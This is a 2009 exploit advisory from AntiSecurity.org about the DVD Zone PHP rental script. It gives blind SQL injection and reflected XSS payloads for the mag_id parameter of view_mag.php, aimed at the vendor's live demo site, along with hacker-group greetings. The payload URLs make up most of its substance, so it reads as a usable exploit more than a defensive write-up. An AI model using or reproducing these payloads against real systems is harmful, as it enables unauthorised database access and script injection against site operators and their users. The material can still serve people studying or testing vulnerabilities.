[x]========================================================================================================================================[x]
 |                                                      AntiSecurity[dot]org                                                                |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Title    		: DVD Zone view_mag.php?mag_id= (BSQL/XSS) Multiple Remote Vulnerabilities					    |
 | Software 		: DVD Zone Boast Your DVD Rental Business									    |
 | Vendor   		: http://www.vastal.com/											    |
 | Demo			: http://dvdzone.vastal.com											    |
 | Price		: $399.99													    |
 | Date    		: 22 September 2009 ( Indonesia )										    |
 | Author   		: OoN_Boy													    |
 | Contact  		: oon.boy9@gmail.com												    |
 | Web	    		: http://oonboy.info												    |
 | Blog     		: http://oonboy.blogspot.com											    |
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
 | Description 		: You can boast the revenue generated by your DVD Rental Business by allowing the users to order online. We have    |
 |			  provided many features which can be really useful for the users who may wish to rent a DVD. They can add a DVD in |
 |			  their wish list and can move the DVD's on their wish list up or down depending on the priority on which they want |
 |			  to rent that DVD. They can see the DVD's which have been sent to them and are on their hands by just visiting     |
 |			  their account. So there is no delay in returning them. You have full control of the genres you want to use through|
 |			  our extensive admin panel. You can add as many DVD's as you want with just a click. You have full control over the|
 |			  CMS of the website, you can edit it on the fly. We have provided a HTML WYSIWYG Editor so you do not have to do   |
 |			  any kind pf programming. Please check out the demo site to see the script in action				    |
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
 | Google Dork 		: uh  ah  oh....												    |
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
 | Exploit 		: http://localhost/[path]/view_mag.php?mag_id=[sql]				 	 			    |
 |			: http://localhost/[path]/view_mag.php?mag_id=[xss]
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
 | Proof of concept	: http://dvdzone.vastal.com/view_mag.php?mag_id=9+and+substring(@@version,1,1)=5 True				    |
 |			  http://dvdzone.vastal.com/view_mag.php?mag_id=9+and+substring(@@version,1,1)=4 False				    |
 |			  http://dvdzone.vastal.com/view_mag.php?mag_id=<script>alert(123)</script>
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
 | Greetz		: antisecurity.org batamhacker.or.id                                                                                |
 |		 	  Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va                       |
 | 		  	  k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere                  |
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
 | Note			: Selamat hariraya idul fitri mohon maaf lahir dan batin, maafin kesalahan ku selama ini yah all :)		    |
 |			  kabur.... untuk sementara waktu.... bye bye.....								    |
[x]========================================================================================================================================[x]